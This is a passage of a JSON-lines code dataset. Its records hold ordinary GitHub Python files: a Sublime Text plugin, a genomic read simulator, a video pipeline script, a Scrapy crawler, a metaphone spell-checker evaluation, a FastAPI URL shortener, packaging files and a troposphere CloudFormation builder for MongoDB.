self.show_quick_panel(self.quick_panel_files, self.path_file_callback, index)\n\n def build_quick_panel_file_list(self):\n self.path_objs = {}\n self.quick_panel_files = []\n if CUR_ITER_ORDER == 1:\n self.quick_panel_files.append(\"/* change iter order to prev */\")\n else:\n self.quick_panel_files.append(\"/* change iter order to next */\")\n\n if os.path.exists(self.get_parent_path(self.path)):\n self.quick_panel_files.append(\"..\")\n\n files_list = _list_path_file(self.path, self.ignore_patterns)\n dirs = []\n files = []\n for file in files_list:\n if os.path.isfile(os.path.join(self.path, file)):\n files.append(file)\n else:\n dirs.append(file + '/')\n\n self.quick_panel_files += dirs\n self.quick_panel_files += files\n\n @staticmethod\n def is_file(entry):\n return not entry.endswith('/')\n\n def path_file_callback(self, index):\n global CUR_ITER_ORDER\n if index == -1:\n return\n\n entry = self.quick_panel_files[index]\n\n if entry == \"..\":\n self.curName = None\n self.show_dir_file(self.get_parent_path(self.path))\n return\n elif entry == \"/* change iter order to prev */\":\n CUR_ITER_ORDER = -1\n return\n elif entry == \"/* change iter order to next */\":\n CUR_ITER_ORDER = 1\n return\n else:\n target = os.path.join(self.path, entry)\n if self.is_file(entry):\n self.view.window().open_file(target)\n else:\n self.show_dir_file(target)\n\n def show_quick_panel(self, options, done_callback, index=None):\n if index is None or not IS_ST3:\n sublime.set_timeout(\n lambda: self.view.window().show_quick_panel(options, done_callback),\n 10)\n else:\n sublime.set_timeout(\n lambda: self.view.window().show_quick_panel(\n options, done_callback, selected_index=index),\n 10)\n","repo_name":"iamstorm/SublimeStorm-Traverse_Current_Directory","sub_path":"cmd_traverse_current_dir.py","file_name":"cmd_traverse_current_dir.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} 
+{"seq_id":"32012879717","text":"\"\"\"\nzot spikein - spike in variants\n\nUsage:\n zot spikein [options] <output-prefix> [<variant>...]\n\nOptions:\n -b BEDFILE restrict sampling of reads to regions in the BED file\n -d DEVIATION standard deviation of insert sizes (proportion of mean) [default: 0.1]\n -e RATE error rate [default: 0.005]\n -f FILE read variants from a file\n -g DIR directory containing reference sequences [default: .]\n -I SIZE insert size [default: 300]\n -l FILE log file for introduced mutations\n -L LENGTH read length [default: 100]\n -m FILE read a file containing <probability, variant> pairs, one per line to introduce stochastically\n -M PROB introduce extra substitution mutations around the variants with the given per-base probability\n -N NUMBER number of read pairs [default: 1000000]\n -S SEED random number generator seed\n -z gzip the output\n -v produce verbose progress messages\n -V VAF variant allele frequency [default: 1.0]\n\nVariants are spiked in right-to-left from the command line or reverse order when read from a file.\nThere is no compensation for position in the application of the variants, so they should be specified\nin position order, and overlapping variants won't work.\n\"\"\"\n\nimport math\nimport os.path\nimport random\nimport sys\n\nimport docopt\nfrom tqdm import tqdm\n\nfrom zotmer.library.file import openFile, readFasta, readFastq\nfrom zotmer.library.misc import uniq\nfrom zotmer.library.hgvs import hg19ToRefSeq, makeHGVS, refSeq2Hg19, Substitution\nfrom zotmer.library.rope import rope\n\ndef normalizeAccession(acc):\n if acc in refSeq2Hg19:\n acc = refSeq2Hg19[acc]\n if not acc.startswith('chr'):\n acc = 'chr' + acc\n return acc\n\nclass SequenceFactory(object):\n def __init__(self, home):\n self.home = home\n self.prevAcc = None\n self.prevSeq = None\n\n def __getitem__(self, acc):\n if acc != self.prevAcc:\n acc = normalizeAccession(acc)\n pth = self.home + '/' + acc + '.fa'\n if not os.path.exists(pth):\n pth = pth + '.gz'\n with openFile(pth) as f:\n for (nm,seq) in readFasta(f):\n self.prevAcc = acc\n self.prevSeq = seq\n break\n return self.prevSeq\n\nclass MultiGen(object):\n def __init__(self, pcs):\n self.cum = []\n t = 0.0\n for (p,v) in pcs:\n t += p\n self.cum.append((t, v))\n\n def gen(self):\n u = random.random()\n l = 0\n h = len(self.cum)\n while l < h:\n m = (l + h) // 2\n if u < self.cum[m][0]:\n h = m\n else:\n l = m + 1\n return self.cum[l][1]\n\nclass GeomVarSource(object):\n def __init__(self, p):\n self.p = p\n self.l1mp = None\n if p > 0:\n self.l1mp = math.log1p(-p)\n\n def __call__(self):\n if self.p == 0:\n return 0\n return int(math.log(random.random()) / self.l1mp)\n\n def make(self, lo, hi):\n if self.p == 0:\n return []\n r = []\n j = lo\n i = 0\n while True:\n j += i + self()\n if j >= hi:\n break\n i = 1\n r.append(j)\n return r\n\nrcDict = {'A':'T', 'C':'G', 'G':'C', 'T':'A'}\n\ndef revComp(s):\n r = []\n for c in s:\n r.append(rcDict.get(c, c))\n return ''.join(r[::-1])\n\naltDict = {}\naltDict['A'] = ['C', 'G', 'T']\naltDict['C'] = ['A', 'G', 'T']\naltDict['G'] = ['A', 'C', 'T']\naltDict['T'] = ['A', 'C', 'G']\n\nbases = ['A', 'C', 'G', 'T']\n\ndef mutate(egen, seq):\n ps = egen.make(0, len(seq))\n\n seq = seq.upper()\n\n if len(ps) == 0:\n return (seq, [])\n\n r = [seq[i] for i in range(len(seq))]\n e = []\n for p in ps:\n c = r[p]\n d = random.choice(altDict.get(c, bases))\n e.append('%d%s>%s' % (p, c, d))\n r[p] = d\n return (''.join(r), e)\n\ndef readBED(f):\n res = {}\n first = True\n for l in f:\n 
t = l.split()\n if first:\n first = False\n if t[0] == 'track' or t[0] =='browser':\n continue\n ch = normalizeAccession(t[0])\n s = int(t[1])\n e = int(t[2])\n n = None\n if len(t) > 3:\n n = t[3]\n v = (s, e, n)\n if ch not in res:\n res[ch] = []\n res[ch].append(v)\n for ch in res.keys():\n res[ch].sort()\n return res\n\ndef applyBackgroundVariants(ch, given, popVars):\n if len(popVars) == 0:\n return given\n if ch not in popVars:\n return given\n\n extra = []\n for (m,p) in popVars[ch]:\n if p < random.random():\n continue\n if len(extra) and extra[-1].overlaps(m):\n continue\n ok = True\n for v in given:\n if v.overlaps(m):\n ok = False\n break\n if ok:\n extra.append(m)\n allOfThem = given + extra\n allOfThem.sort()\n return allOfThem\n\ndef between(st, en, v):\n \"\"\"test if a variant lies within a range\"\"\"\n r = v.range()\n return all([st <= r[0], r[0] <= en, st <= r[1], r[1] <= en])\n\ndef overlaps(st, en, v):\n \"\"\"test if a variant lies within a range\"\"\"\n r = v.range()\n if st <= r[0] and r[0] <= en:\n return True\n if st <= r[1] and r[1] <= en:\n return True\n if r[0] <= st and st <= r[1]:\n return True\n if r[0] <= en and en <= r[1]:\n return True\n return False\n\nclass ReadMaker(object):\n def __init__(self, **kwargs):\n # Chromosome and Region of interest\n #\n self.chrom = kwargs['chrom']\n self.zone = kwargs['zone']\n\n # Read Length\n #\n self.L = kwargs['L']\n\n # Insert Size\n #\n self.I = kwargs['I']\n\n # Fragment relative std-dev (as a faction of insert size)\n #\n self.D = kwargs['D']\n\n # List of *chromosome* variants\n #\n self.variants = kwargs['variants']\n\n # Fasta or Fastq?\n #\n self.fasta = kwargs['fasta']\n\n self.seqFac = kwargs['sf']\n self.egen = kwargs['egen']\n\n def prepareAllele(self):\n (st, en, nm) = self.zone\n\n # Select the variants that lie within this range.\n #\n ws = [v for v in self.variants if overlaps(st, en, v)]\n ws.sort(reverse=True)\n\n seq = self.seqFac[self.chrom]\n G = len(seq)\n\n s0 = st\n e0 = en\n seq = rope.atom(seq)\n\n for v in ws:\n r = v.range()\n l = r[1] - r[0]\n e0 -= l\n e0 += v.size()\n seq = v.apply(seq)\n\n self.seq = seq\n self.sourceRange = (s0, e0)\n self.quals = 'I' * self.L\n\n def makeReadFromZone(self):\n G = len(self.seq)\n\n (s0, e0) = self.sourceRange\n\n u = random.randint(s0, e0)\n\n fl = int(random.gauss(self.I, self.I*self.D))\n fl = max(fl, self.L + self.L // 2)\n\n if u - fl < 0:\n u = fl\n if u + fl > G:\n u = G - fl\n\n assert 0 <= u and u + fl <= G\n\n frag = self.seq[u:u+fl]\n\n if random.random() < 0.5:\n s = '+'\n else:\n s = '-'\n frag = revComp(frag)\n\n r1 = frag[:self.L]\n r2 = frag[-self.L:]\n\n (r1, e1) = mutate(self.egen, r1)\n (r2, e2) = mutate(self.egen, r2)\n\n ch = self.chrom\n (st, en, nm) = self.zone\n out1 = []\n out2 = []\n if self.fasta:\n out1 += ['>' + ' '.join([ch, str(st), str(en), nm, str(u), str(fl), s] + e1)]\n out1 += [r1]\n\n out2 += ['>' + ' '.join([ch, str(st), str(en), nm, str(u), str(fl), s] + e2)]\n out2 += [r2]\n else:\n out1 += ['@%s:%d-%d %s %d %d %s %s' % (ch, st, en, nm, u, fl, s, ';'.join(e1))]\n out1 += [r1]\n out1 += ['+']\n out1 += [self.quals]\n out2 += ['@%s:%d-%d %s %d %d %s %s' % (ch, st, en, nm, u, fl, s, ';'.join(e2))]\n out2 += [r2]\n out2 += ['+']\n out2 += [self.quals]\n return ('\\n'.join(out1), '\\n'.join(out2))\n\ndef main(argv):\n opts = docopt.docopt(__doc__, argv)\n\n sf = SequenceFactory(opts['-g'])\n\n I = int(opts['-I'])\n D = float(opts['-d'])\n E = float(opts['-e'])\n L = int(opts['-L'])\n N = int(opts['-N'])\n V = 
float(opts['-V'])\n\n M = None\n if opts['-M'] is not None:\n M = float(opts['-M'])\n # compute the 99% quantile\n W = int(math.log1p(-0.99)/math.log1p(-M))\n\n S = None\n if opts['-S'] is not None:\n S = int(opts['-S'])\n random.seed(S)\n\n if opts['-b']:\n zones = readBED(openFile(opts['-b']))\n else:\n zones = {}\n for ch in refSeq2Hg19.values():\n ch = normalizeAccession(ch)\n s = sf[ch]\n v = (1, len(s), ch)\n if ch not in zones:\n zones[ch] = []\n zones[ch].append(v)\n\n popVars = {}\n if opts['-m'] is not None:\n with openFile(opts['-m']) as f:\n for l in f:\n t = l.split()\n p = float(t[0])\n v = makeHGVS(t[1], sf)\n a = normalizeAccession(v.accession())\n if a not in popVars:\n popVars[a] = []\n popVars[a].append((v,p))\n for ch in popVars.keys():\n popVars[ch].sort()\n\n t = 0\n chMax = 0\n for ch in zones.keys():\n chMax = max(chMax, len(ch))\n for zone in zones[ch]:\n (s, e, _n) = zone\n l = e - s + 1\n t += l\n\n if opts['-v']:\n print >> sys.stderr, 'mean coverage = %g' % (float(N*L)/float(t),)\n\n zoneCounts = {}\n zoneProbs = []\n for ch in zones.keys():\n zoneCounts[ch] = {}\n for zone in zones[ch]:\n zoneCounts[ch][zone] = 0\n (s, e, _n) = zone\n l = e - s + 1\n zoneProbs.append((float(l)/float(t), (ch, zone)))\n zgen = MultiGen(zoneProbs)\n for n in xrange(N):\n (ch,z) = zgen.gen()\n if z not in zoneCounts[ch]:\n zoneCounts[ch][z] = 0\n zoneCounts[ch][z] += 1\n\n vStrs = opts['<variant>']\n if opts['-f'] is not None:\n with openFile(opts['-f']) as f:\n for l in f:\n s = l.strip()\n vStrs.append(s)\n\n allVars = {}\n for s in vStrs:\n v = makeHGVS(s, sf)\n if v is None:\n print >> sys.stderr, 'unable to parse variant: %s', (s, )\n continue\n if v.anonymous():\n n = v.size()\n seq = ''.join([random.choice(['A', 'C', 'G', 'T']) for i in range(n)])\n v.setSequence(seq)\n a = normalizeAccession(v.accession())\n if a not in allVars:\n allVars[a] = []\n allVars[a].append(v)\n\n numOverlaps = 0\n for xs in allVars.values():\n xs.sort()\n for i in range(len(xs)):\n for j in range(i + 1, len(xs)):\n if xs[i].overlaps(xs[j]):\n print >> sys.stderr, \"variants overlap: %s <> %s\" % (str(xs[i]), str(xs[j]))\n numOverlaps += 1\n if numOverlaps > 0:\n sys.exit(1)\n\n prog = None\n if opts['-v']:\n prog = tqdm(total = N, unit='pairs')\n\n egen = GeomVarSource(E)\n\n fasta = False\n\n logfile = None\n if opts['-l']:\n logfile = open(opts['-l'], 'w')\n\n pfx = opts['<output-prefix>']\n sfx = ''\n if opts['-z']:\n sfx = '.gz'\n with openFile(pfx + '_1.fastq' + sfx, 'w') as out1, openFile(pfx + '_2.fastq' + sfx, 'w') as out2:\n for ch in zones.keys():\n if prog is not None:\n prog.set_description(ch.ljust(chMax, ' '))\n prog.update(0)\n chVars = []\n if ch in allVars:\n chVars = allVars[ch]\n\n wtVars = applyBackgroundVariants(ch, [], popVars)\n mutVars = applyBackgroundVariants(ch, chVars, popVars)\n\n for zone in zones[ch]:\n wtMaker = ReadMaker(chrom=ch, zone=zone, L=L, I=I, D=D, variants=wtVars, fasta=fasta, egen=egen, sf=sf)\n wtMaker.prepareAllele()\n\n mutMaker = ReadMaker(chrom=ch, zone=zone, L=L, I=I, D=D, variants=mutVars, fasta=fasta, egen=egen, sf=sf)\n mutMaker.prepareAllele()\n\n for i in xrange(zoneCounts[ch][zone]) :\n if prog is not None:\n prog.update(1)\n u = random.random()\n if u > V:\n (rd1,rd2) = wtMaker.makeReadFromZone()\n else:\n (rd1,rd2) = mutMaker.makeReadFromZone()\n print >> out1, rd1\n print >> out2, rd2\n\n if prog is not None:\n prog.__exit__(None, None, None)\n\nif __name__ == '__main__':\n 
main(sys.argv[1:])\n\n","repo_name":"drtconway/zotmer","sub_path":"zotmer/commands/spikein.py","file_name":"spikein.py","file_ext":"py","file_size_in_byte":13023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35597221493","text":"import os\nimport time\nfrom multiprocessing import Process, Value\nfrom pathlib import Path\nfrom shutil import rmtree\nimport shutil\n\nfrom tqdm.auto import tqdm\nfrom tool.files import *\nfrom tool.videos import *\n\ndef extract():\n os.system(\"python extractFrames.py\")\n\ndef generate():\n os.system(\"python genMultimodal.py\")\n\ninputFolder = \"inputFolder\"\ninputVideos = \"inputVideos\"\noutputFolder =\"output\"\nos.system(\"python clean.py\")\n\n\ninputFolders = onlyfolders(inputFolder)\nprint(\"Found input folders: \", inputFolders)\n\nfor folder in inputFolders:\n files = onlyfiles(folder)\n print(\"Found %i files in %s folder\"%(len(files), folder.split(os.sep)[-1]))\n for file in files:\n shutil.move(file, inputVideos + os.sep + file.split(os.sep)[-1])\n removeAllFiles(folder)\n extractor = Process(target= extract)\n extractor.start()\n generator = Process(target = generate)\n generator.start()\n generator.join()\n # move output files back into same folder structure as input (in finalOutput)\n try:\n os.mkdir(\"finalOutput\")\n except:\n pass\n try:\n os.mkdir(\"finalOutput\" + os.sep + folder.split(os.sep)[-1])\n except:\n pass\n outputs = onlyfiles(outputFolder)\n for o in outputs:\n print(o, \"finalOutput\"+ os.sep + o.split(os.sep)[-1] )\n shutil.move(o, \"finalOutput\"+ os.sep + folder.split(os.sep)[-1] + os.sep + o.split(os.sep)[-1] )\n","repo_name":"UoA-CARES/multimodal-data-pipeline","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11261953491","text":"import scrapy\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom urllib.parse import urlparse\nimport hashlib\nimport json\n\n\nclass MainSpider(CrawlSpider):\n name = \"main\"\n\n rules = (Rule(LinkExtractor(), callback=\"parse_item\", follow=True),)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n with open(self.domains_file, \"r\") as f:\n self.start_urls = f.read().split(\"\\n\")\n self.allowed_domains = [urlparse(url).netloc for url in self.start_urls]\n\n def parse_start_url(self, response):\n return self.parse_item(response)\n\n def parse_item(self, response):\n try:\n body_decoded = response.body.decode()\n except UnicodeDecodeError:\n body_decoded = \"<binary>\"\n\n headers = []\n for name, values in response.headers.items():\n for value in values:\n headers.append({\"name\": name.decode(), \"value\": value.decode()})\n\n item = dict(\n status=response.status,\n url=response.url,\n domain_name=urlparse(response.url).netloc,\n body=body_decoded,\n response_size=len(response.body),\n headers=headers,\n )\n yield item\n","repo_name":"cisagov/crossfeed","sub_path":"backend/worker/webscraper/webscraper/spiders/main_spider.py","file_name":"main_spider.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":323,"dataset":"github-code","pt":"81"} +{"seq_id":"38244757160","text":"import jellyfish\nimport time\n\nfile = open(\"misspell.txt\", 'r')\nmis = file.readlines()\nfile.close()\n\nfile = open(\"correct.txt\", 'r')\ncor = 
file.readlines()\nfile.close()\n\nfile = open(\"dict.txt\", 'r')\ndic = file.readlines()\nfile.close()\n\nnum = 0\ncorrectnum = 0\n\nwriteTXT = open(\"Metaphone.txt\", \"w\")\n\ndictionary = []\nfor line in dic:\n temp = line.strip()\n dictionary.append(temp)\n\ncorrect = []\nfor line in cor:\n temp = line.strip()\n correct.append(temp)\n\nmisspell = []\nfor line in mis:\n temp = line.strip()\n misspell.append(temp)\n\ntime_start = time.time()\n\nmetacodes = []\nfor dicWord in dictionary:\n metacode = jellyfish.metaphone(dicWord)\n metacodes.append(metacode)\n\nfor line in range(0, len(misspell)):\n current = misspell[line]\n prediction = []\n result = []\n metacode = jellyfish.metaphone(current)\n\n for meta in range(0,len(metacodes)):\n if metacode == metacodes[meta]:\n prediction.append(dictionary[meta])\n num += 1\n\n if correct[line] in prediction:\n correctnum += 1\n result.append(\"T\")\n else:\n result.append(\"F\")\n\n writeTXT.write(current + ',' + metacode + ',' + str(prediction) + ',' + str(result) + '\\n')\n\ntime_end = time.time()\n\nruntime = time_end - time_start\n\npricision = (float(correctnum) / float(num)) * 100\nrecall = (float(correctnum) / float(10322)) * 100\n\nprint(correctnum, num, pricision, recall)\nprint(str(runtime))\nwriteTXT.write(\"correctnum = \" + str(correctnum) + '\\n' + \"totalnum = \" + str(num) + '\\n' + \"pricision = \" + str(\n pricision) + '\\n' + \"recall = \" + str(recall) + \"\\n\" + \"runtime = \" + str(runtime))\n\nwriteTXT.close()\n","repo_name":"ASCII-768977/GlobalDistance-Metaphone-nGram-Soundex","sub_path":"code/metaphone.py","file_name":"metaphone.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73862719946","text":"import fastapi\nfrom fastapi import security\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import Response\n\nfrom api.complaint import ComplaintRouter\nfrom api.link import LinkRouter\nfrom api.user import UserRouter\nfrom settings import settings\n\napp = fastapi.FastAPI(\n title=\"URL Shortener\",\n description=\"A URL shortening service with more features\",\n version=\"0.1.0\",\n license_info={\n \"name\": \"MIT\",\n },\n)\n\noauth2_scheme = security.OAuth2PasswordBearer(tokenUrl=\"token\")\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=settings.allow_origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/\")\nasync def healthcheck():\n return Response(\"OK\")\n\n\napp.include_router(UserRouter)\napp.include_router(LinkRouter)\napp.include_router(ComplaintRouter)\n","repo_name":"Krishap-s/url-shortener","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24029306811","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"match_sim-ckear\",\n author=\"Conor Kearney\",\n author_email=\"ckear@example.com\",\n description=\"A small example package\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/ckear/match_sim\",\n packages=setuptools.find_packages(),\n package_data={\n 'match_sim': ['data/defaults/*.txt', 'data/formations/*.txt', 'data/settings/*.json'],\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: 
MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires=\">=2.7\",\n extras_require={\n \"run\": [\n ],\n \"dev\": [\n \"pyfiglet>=0.8\",\n \"progressbar>=2.5\",\n \"numpy>=1.16.6\",\n \"tqdm>=4.46.1\",\n \"prettytable>=0.7.2\",\n \"names>=0.3.0\",\n \"python-dateutil>=2.8.1\",\n \"barnum>=0.5.1\",\n \"dill>=0.3.1.1\",\n \"wxPython>=4.1.0\",\n \"pytest>=3.5\",\n ],\n \"gen_tests\": [\n ] \n },\n use_scm_version=True,\n setup_requires=[\"setuptools_scm\"],\n)\n","repo_name":"ckear1989/match_sim","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"815195923","text":"from claseEmail import Email\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Ingrese datos\")\r\n id = input(\" ingrese id cuenta: \")\r\n dominio = input(\" ingrese dominio: \")\r\n tipodom = input(\" ingrese el tipo de dominio: \")\r\n contraseña = input(\" ingrese la contraseña: \")\r\n unemail = Email(id, dominio, tipodom, contraseña)\r\n unemail.retornaEmail()\r\n unemail.getdominio()\r\n\r\n direccion = input(\" ingrese direccion correo: \")\r\n mail = Email(0, 0, 0, 0)\r\n mail.crearcuenta(direccion)\r\n mail.retornaEmail()\r\n\r\n nombre = input(\"ingrese nombre:\")\r\n email = input(\"ingrese email\")\r\n print(f\"Estimado {nombre} te enviaremos tus mensajes a la direccion {email}\")\r\n contra = input(\" ingrese la contraseña actual: \")\r\n# mail.modificarcontrasenia(contra)\r\n","repo_name":"BALTAR1/Poo-Facultad","sub_path":"Unidad2/python ejer 1 unidad 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2453790507","text":"from troposphere import Ref,Sub,Base64, Template, Output, GetAtt, ImportValue, Export, ec2, Tags, route53\nfrom troposphere.events import Rule, Target\nfrom troposphere.cloudformation import WaitCondition, WaitConditionHandle\nfrom troposphere.sns import Subscription\nfrom troposphere import awslambda\nfrom functools import partial\nimport argparse\nimport boto3\nimport json\nimport sys\nfrom . import iam as create_iam\nfrom . import custom_funcs\nfrom . 
import tcpstacks\nimport awacs\nimport awacs.logs as logs\nimport create.network\nfrom create import export_ref, import_ref\n\n\ndef mongo_userdata(db_type, db_name, ops, app_cfn_options, db_ips, userdata_file):\n\n cf_param_refs = {k:v for k,v in app_cfn_options.cf_params.items()}\n userdata_vars = {k:ops.get(v) for k,v in ops.userdata_exports.items()}\n userdata_vars.update(cf_param_refs)\n userdata_vars.update(dict( LOG_GROUP = app_cfn_options.log_group,\n resource_name = db_name))\n userdata_vars.update(dict( MONGO_TYPE = db_type))\n userdata_vars.update(db_ips)\n userdata_1 = create.ec2.multipart_userdata(\n bash_files = [userdata_file],\n install_packages = [\"docker\"],\n sub_values = userdata_vars,\n ip_list = db_ips,\n )\n return userdata_1\n\ndef add_instances(template, ops, app_cfn_options, db_name, db_type, instance_type, db_ips, userdata_file, az, previous_instance, fs_mounts):\n subnet = app_cfn_options.mongo_subnets[az]\n iam_profile = ImportValue(app_cfn_options.resource_names['ec2_iam_profile'])\n\n ebs_volume = ec2.EBSBlockDevice( VolumeSize = \"100\", Encrypted = False, VolumeType = \"gp2\", DeleteOnTermination = True)\n bdm = ec2.BlockDeviceMapping( DeviceName = '/dev/sdf', Ebs = ebs_volume)\n ec2_instance_func = partial(\n ec2.Instance,\n db_name,\n ImageId = ops.ami_image,\n InstanceType = instance_type, #TODO: config option\n KeyName = app_cfn_options.cf_params.get('KeyName'),\n SubnetId = subnet,\n AvailabilityZone = ops.availability_zones[az],\n IamInstanceProfile = iam_profile,\n Tags = Tags(\n Name = db_name,\n Env = ops.deploy_env,\n BillingID = ops.billing_id\n ),\n BlockDeviceMappings = [bdm],\n SecurityGroupIds = [GetAtt(app_cfn_options.mongo_sg_name,\"GroupId\")],\n UserData = mongo_userdata(db_type, db_name, ops, app_cfn_options, db_ips, userdata_file),\n )\n if previous_instance:\n instance = template.add_resource(ec2_instance_func(DependsOn=previous_instance))\n else:\n instance = template.add_resource(ec2_instance_func())\n tcpstacks.create_disk_cloudwatch_alarm( template, Ref(instance), db_name, ops.email_topic_arn, fs_mounts)\n tcpstacks.create_memory_cloudwatch_alarm(template, Ref(instance), db_name, ops.email_topic_arn)\n\ndef create_cloudwatch_rule(template, ops, app_cfn_options):\n mongo_inst_ids = dict()\n insta_id_list = []\n for count,instance_names in enumerate(sorted(app_cfn_options.db_names)):\n insta_id = \"\".join([\"INST_ID\",str(count)])\n mongo_inst_ids[insta_id] = Ref(instance_names)\n insta_id_list.append(\"\".join([\"${\",insta_id,\"}\"]))\n for action in [\"Start\",\"Stop\"]:\n rule_name = \"\".join([\"CloudWatch\",action,\"Rule\"])\n if( action == \"Start\" ):\n cron_patn = \"cron(0 19 ? * 1-5 *)\"\n else:\n cron_patn = \"cron(0 7 ? 
* 2-6 *)\"\n mongo_inst_ids.update(ACTION = action, REGION = ops.aws_region)\n input_patn = dict( Action = \"${ACTION}\", Region = \"${REGION}\",\n Instances = insta_id_list)\n input_pattern = json.dumps(input_patn, sort_keys=True)\n input_string = Sub(input_pattern,**mongo_inst_ids)\n lambda_id = \"\".join([ops.app_name,\"MongoStartStopFunction\"])\n lambda_target = Target( \"LambdaTarget\",\n Arn = app_cfn_options.lambda_arn,\n Id = lambda_id,\n Input = input_string)\n cloudwatch_rule = template.add_resource(Rule( rule_name,\n Description = \"\".join([\"CloudWatch Event \",action,\" Rule for\",ops.app_name,\" Mongo\"]),\n ScheduleExpression = cron_patn,\n State = \"ENABLED\",\n Targets = [lambda_target] ))\n invoke_name = \"\".join([\"MongoLambdaInvoke\",action])\n lambda_invoke_permissions(template, invoke_name, app_cfn_options.lambda_arn, GetAtt(cloudwatch_rule,\"Arn\"))\n\ndef create_lambda_func(template, ops, app_cfn_options):\n deploy_bucket = ops.deploy_bucket\n deploy_env = ops.deploy_env\n app_name = ops.app_name\n\n self_log_action = create_iam.lambda_self_logging(app_name)\n lambda_mongo_start_stop_role = [\n self_log_action,\n create_iam.make_statement(\n actions = [\n awacs.ec2.StartInstances,\n awacs.ec2.StopInstances,\n awacs.logs.CreateLogGroup,\n awacs.logs.CreateLogStream,\n awacs.logs.PutLogEvents,\n ],\n resources = [\"*\"],\n )\n ]\n lambda_mongo_start_stop_iam = custom_funcs.lambda_iam(template, \"LambdaCronRole\", lambda_mongo_start_stop_role,)\n custom_funcs.check_lambda_code(ops.deploy_bucket, deploy_env, \"./create_cloudformation/lambdas/mongo_start_stop_lambda.py\", lib_files = [])\n lambda_func = custom_funcs.lambda_function(\n template,\n \"LambdaCronResource\",\n deploy_bucket = ops.deploy_bucket,\n local_file = \"./create_cloudformation/lambdas/mongo_start_stop_lambda.py\",\n iam_role = GetAtt(lambda_mongo_start_stop_iam,\"Arn\"),\n s3_prefix = deploy_env,\n )\n app_cfn_options.lambda_arn = GetAtt(lambda_func,\"Arn\")\n\ndef lambda_invoke_permissions(template, name, lambda_arn, source_arn):\n template.add_resource(\n awslambda.Permission(\n name,\n FunctionName = lambda_arn,\n Action = \"lambda:InvokeFunction\",\n Principal = \"events.amazonaws.com\",\n SourceArn = source_arn,\n )\n )\n\ndef create_record_set(template, ops, app_cfn_options, mongo_dbs, dbconfig_ip, count):\n record_set = mongo_dbs.split(\":\",1)[0]\n hosted_zone = record_set.split(\".\",1)[1]\n rec_set_name = \"\".join([\"MongoRecordSet\",str(count)])\n rec_set = template.add_resource(route53.RecordSetType( rec_set_name, Type = 'A',\n Name = record_set, TTL = 300,\n HostedZoneName = hosted_zone,\n ResourceRecords = [dbconfig_ip]))\n\ndef mongo_stack(template, ops, app_cfn_options, stack_name, stack_setup):\n\n app_nets = [val for key,val in sorted(ops.app_networks.items())]\n app_ports = set([val[1] for key,val in ops.port_map.items()])\n cf_params = app_cfn_options.cf_params\n stack_name = stack_setup['stack_name']\n\n mongo_subnets = dict()\n mongo_networks = stack_setup['networks']\n mongo_ports = stack_setup['ports']\n number_of_shards = stack_setup['number_of_shards']\n custom_mongo_rules = stack_setup['custom_rules']\n shard_userdata = stack_setup['shards_userdata']\n config_userdata = stack_setup['config_userdata']\n man_userdata = stack_setup['man_userdata']\n mongo_dbs = stack_setup['mongo_dbs']\n enableArbiter = stack_setup['enableArbiter']\n fs_mounts = stack_setup['fs_mounts']\n stack_resource_name = \"\".join([ops.app_name, stack_name])\n app_cfn_options.mongo_sg_name = 
ops.app_name+\"Sg\"+stack_name\n mongo_nets = [val for key,val in sorted(mongo_networks.items())]\n\n for az,cidr in sorted(mongo_networks.items()):\n net_name = \"\".join([ops.app_name,\"Sn\",stack_name,az])\n subnet = create.network.subnet(template, ops.vpc_id, net_name, cidr, ops.availability_zones[az],ops.billing_id,ops.deploy_env)\n mongo_subnets[az] = subnet\n create.network.routetable( template, ops.vpc_id, \"Route\"+net_name, subnet, nat_id = ops.nat_host_ids[az],\n vpn_id = ops.ofc_vpn_id, vpn_route = ops.vpn_route)\n mongo_nacl_factory = create.network.AclFactory(\n template,\n name = \"\".join([ops.app_name,\"NetAcl\",stack_name]),\n vpc_id = ops.vpc_id,\n in_networks = app_nets,\n in_ports = mongo_ports,\n out_ports = ops.out_ports,\n out_networks = app_nets,\n ssh_hosts = ops.get(\"deploy_hosts\"),\n )\n export_ref(\n template,\n export_name = \"\".join([ops.app_name,\"NetAcl\",stack_name]),\n value = Ref(\"\".join([ops.app_name,\"NetAcl\",stack_name])),\n desc = \" {stack} NetAcl \".format(stack=stack_resource_name)\n )\n\n for count,az in enumerate(sorted(mongo_subnets.keys())):\n assoc_name = stack_name+\"AclAssoc\"+az+str(count)\n subnet = mongo_subnets[az]\n create.network.assoc_nacl_subnet(template, assoc_name, mongo_nacl_factory.nacl, subnet)\n\n mongo_sg = create.network.sec_group(template,\n name = app_cfn_options.mongo_sg_name,\n in_networks = sorted(mongo_nets),\n in_ports = mongo_ports,\n out_ports = 